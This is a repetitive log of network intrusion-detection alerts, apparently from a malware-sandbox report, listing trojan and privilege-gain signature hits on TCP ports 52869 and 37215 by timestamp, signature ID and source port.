                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:09.698680
                      SID:2027339
                      Source Port:43792
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.223936
                      SID:2025132
                      Source Port:45822
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:16.055924
                      SID:2027339
                      Source Port:39028
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.949518
                      SID:2027339
                      Source Port:41090
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.166360
                      SID:2025132
                      Source Port:54686
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:58.378138
                      SID:2027339
                      Source Port:40956
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:07.959908
                      SID:2025132
                      Source Port:46670
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:12.244446
                      SID:2831300
                      Source Port:47086
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:52.478141
                      SID:2831300
                      Source Port:47324
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:15.435068
                      SID:2027339
                      Source Port:51392
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.600216
                      SID:2829579
                      Source Port:34148
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:08.328920
                      SID:2025132
                      Source Port:38156
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:00.170743
                      SID:2831300
                      Source Port:35602
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:07.664572
                      SID:2027339
                      Source Port:45580
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.345649
                      SID:2829579
                      Source Port:35720
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:08.565771
                      SID:2027339
                      Source Port:40816
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:07.975226
                      SID:2027339
                      Source Port:34874
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.600216
                      SID:2829579
                      Source Port:55888
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.440208
                      SID:2831300
                      Source Port:35038
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:37.447263
                      SID:2027339
                      Source Port:49860
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.245949
                      SID:2835222
                      Source Port:56052
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:44.364083
                      SID:2831300
                      Source Port:36768
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:13.319028
                      SID:2027339
                      Source Port:36088
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:19.727778
                      SID:2025132
                      Source Port:51782
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.275713
                      SID:2027339
                      Source Port:41068
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.471230
                      SID:2027339
                      Source Port:41426
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.598486
                      SID:2025132
                      Source Port:47600
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:39.035942
                      SID:2835222
                      Source Port:33066
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.285003
                      SID:2027339
                      Source Port:54278
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.046185
                      SID:2027339
                      Source Port:39342
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.421092
                      SID:2027339
                      Source Port:57542
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.587077
                      SID:2027339
                      Source Port:58094
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.470290
                      SID:2831300
                      Source Port:41742
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:47.470061
                      SID:2025132
                      Source Port:44938
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:56.106041
                      SID:2829579
                      Source Port:55992
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.365818
                      SID:2025132
                      Source Port:57624
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:27.853068
                      SID:2027339
                      Source Port:43930
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.522257
                      SID:2835222
                      Source Port:36974
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.656192
                      SID:2835222
                      Source Port:34800
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.557200
                      SID:2829579
                      Source Port:41234
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:08.628126
                      SID:2025132
                      Source Port:40512
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:50.555898
                      SID:2829579
                      Source Port:33646
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.325754
                      SID:2835222
                      Source Port:60424
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.465013
                      SID:2027339
                      Source Port:50678
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.471609
                      SID:2831300
                      Source Port:50214
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:02.906267
                      SID:2027339
                      Source Port:35052
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.997034
                      SID:2027339
                      Source Port:39212
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.773172
                      SID:2835222
                      Source Port:51854
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:13.705655
                      SID:2831300
                      Source Port:57532
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:03.378832
                      SID:2835222
                      Source Port:33772
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.662485
                      SID:2835222
                      Source Port:33088
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.036527
                      SID:2835222
                      Source Port:52264
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.640803
                      SID:2025132
                      Source Port:49764
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:35.378993
                      SID:2027339
                      Source Port:45306
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.927462
                      SID:2027339
                      Source Port:33288
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.830838
                      SID:2835222
                      Source Port:42092
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.771399
                      SID:2829579
                      Source Port:41986
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:50.028546
                      SID:2027339
                      Source Port:35390
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.557712
                      SID:2831300
                      Source Port:41386
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:52.728679
                      SID:2831300
                      Source Port:36602
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:02.417792
                      SID:2831300
                      Source Port:41696
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:13.391443
                      SID:2027339
                      Source Port:54808
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.129772
                      SID:2829579
                      Source Port:54418
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:19.756250
                      SID:2027339
                      Source Port:56612
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.224583
                      SID:2027339
                      Source Port:33796
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.526908
                      SID:2835222
                      Source Port:41124
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.554753
                      SID:2027339
                      Source Port:42240
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.086079
                      SID:2835222
                      Source Port:43640
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.229188
                      SID:2025132
                      Source Port:44404
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:02.417792
                      SID:2831300
                      Source Port:48630
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:36.325662
                      SID:2835222
                      Source Port:57268
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.233976
                      SID:2027339
                      Source Port:46676
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.879451
                      SID:2027339
                      Source Port:34870
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.763636
                      SID:2027339
                      Source Port:38524
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.137269
                      SID:2835222
                      Source Port:47964
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.653253
                      SID:2835222
                      Source Port:51844
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.314185
                      SID:2027339
                      Source Port:55454
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.454499
                      SID:2831300
                      Source Port:35954
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.224112
                      SID:2027339
                      Source Port:32832
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.516920
                      SID:2027339
                      Source Port:58056
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.441296
                      SID:2027339
                      Source Port:52642
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.925501
                      SID:2027339
                      Source Port:39662
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.290865
                      SID:2027339
                      Source Port:35294
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.522257
                      SID:2829579
                      Source Port:41760
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.787750
                      SID:2829579
                      Source Port:37662
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.590968
                      SID:2027339
                      Source Port:35096
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.757977
                      SID:2025132
                      Source Port:41126
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.476343
                      SID:2831300
                      Source Port:59062
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:02.283865
                      SID:2831300
                      Source Port:50622
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:12.509551
                      SID:2831300
                      Source Port:34098
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:02.867753
                      SID:2027339
                      Source Port:39890
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.634552
                      SID:2027339
                      Source Port:41384
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.198211
                      SID:2025132
                      Source Port:34238
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:47.464031
                      SID:2027339
                      Source Port:38982
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.900578
                      SID:2027339
                      Source Port:49674
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.953817
                      SID:2829579
                      Source Port:49760
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.353037
                      SID:2831300
                      Source Port:50438
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:05.101340
                      SID:2027339
                      Source Port:59942
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.438719
                      SID:2025132
                      Source Port:46728
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.472268
                      SID:2027339
                      Source Port:55490
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:18.422288
                      SID:2831300
                      Source Port:43376
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:52.545166
                      SID:2831300
                      Source Port:56776
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:59.303078
                      SID:2027339
                      Source Port:55776
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:29.180793
                      SID:2025132
                      Source Port:52988
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:09.320815
                      SID:2027339
                      Source Port:56028
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.017303
                      SID:2025132
                      Source Port:51846
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.531304
                      SID:2027339
                      Source Port:38746
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.178719
                      SID:2831300
                      Source Port:33796
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:07.332948
                      SID:2025132
                      Source Port:53152
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:58.875074
                      SID:2027339
                      Source Port:36758
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.528919
                      SID:2829579
                      Source Port:41354
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.644108
                      SID:2831300
                      Source Port:48092
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:16.651508
                      SID:2025132
                      Source Port:33502
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:39.765891
                      SID:2835222
                      Source Port:59422
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:17.435643
                      SID:2027339
                      Source Port:52354
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.161619
                      SID:2027339
                      Source Port:50328
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.653975
                      SID:2027339
                      Source Port:38208
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.994638
                      SID:2025132
                      Source Port:60588
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:12.543371
                      SID:2025132
                      Source Port:49356
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:38.452869
                      SID:2027339
                      Source Port:59494
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.861759
                      SID:2829579
                      Source Port:59492
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.249229
                      SID:2831300
                      Source Port:41114
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:29.433951
                      SID:2027339
                      Source Port:37660
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.863090
                      SID:2829579
                      Source Port:59976
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.575727
                      SID:2027339
                      Source Port:33328
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:24.662240
                      SID:2025132
                      Source Port:57172
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.462607
                      SID:2831300
                      Source Port:51864
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:36.324298
                      SID:2835222
                      Source Port:50794
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.927462
                      SID:2027339
                      Source Port:33820
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.086079
                      SID:2829579
                      Source Port:37870
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.014311
                      SID:2835222
                      Source Port:52034
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:17.555463
                      SID:2025132
                      Source Port:40984
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:47.125782
                      SID:2835222
                      Source Port:43922
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.069521
                      SID:2829579
                      Source Port:48384
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.119232
                      SID:2831300
                      Source Port:56900
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:08.903735
                      SID:2027339
                      Source Port:46430
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.997543
                      SID:2831300
                      Source Port:43796
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:08.993675
                      SID:2829579
                      Source Port:34502
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.625091
                      SID:2027339
                      Source Port:53744
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.603344
                      SID:2027339
                      Source Port:56742
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.625707
                      SID:2835222
                      Source Port:55664
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:24.304142
                      SID:2027339
                      Source Port:42484
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.180899
                      SID:2829579
                      Source Port:38938
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.997543
                      SID:2025132
                      Source Port:36560
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:31.773037
                      SID:2027339
                      Source Port:45584
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.369944
                      SID:2027339
                      Source Port:57116
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.339999
                      SID:2829579
                      Source Port:40056
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.078777
                      SID:2829579
                      Source Port:57368
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.572869
                      SID:2027339
                      Source Port:40470
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.093934
                      SID:2027339
                      Source Port:36852
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.090071
                      SID:2027339
                      Source Port:36554
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.248123
                      SID:2831300
                      Source Port:34408
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.173548
                      SID:2025132
                      Source Port:44974
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:42.256029
                      SID:2835222
                      Source Port:51404
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.656192
                      SID:2829579
                      Source Port:42462
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.256977
                      SID:2027339
                      Source Port:57404
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:13.525153
                      SID:2831300
                      Source Port:51928
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:52.682403
                      SID:2831300
                      Source Port:57596
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:42.127943
                      SID:2835222
                      Source Port:42066
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.691705
                      SID:2027339
                      Source Port:51676
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:09.697115
                      SID:2027339
                      Source Port:60040
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:07.975226
                      SID:2027339
                      Source Port:37176
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:17.237965
                      SID:2027339
                      Source Port:33250
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.394385
                      SID:2025132
                      Source Port:39062
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:17.539924
                      SID:2829579
                      Source Port:60248
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.942639
                      SID:2027339
                      Source Port:48000
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:16.113185
                      SID:2027339
                      Source Port:50376
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.513809
                      SID:2027339
                      Source Port:57834
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.899872
                      SID:2025132
                      Source Port:51996
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.106017
                      SID:2025132
                      Source Port:54990
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:02.436396
                      SID:2025132
                      Source Port:51570
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:08.903734
                      SID:2027339
                      Source Port:52924
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.124038
                      SID:2025132
                      Source Port:38838
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.459218
                      SID:2831300
                      Source Port:42968
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:37.648285
                      SID:2831300
                      Source Port:37916
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:39.324403
                      SID:2027339
                      Source Port:39016
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.762457
                      SID:2025132
                      Source Port:50672
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.464785
                      SID:2025132
                      Source Port:48726
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:58.384426
                      SID:2027339
                      Source Port:48694
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:31.652096
                      SID:2025132
                      Source Port:60844
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
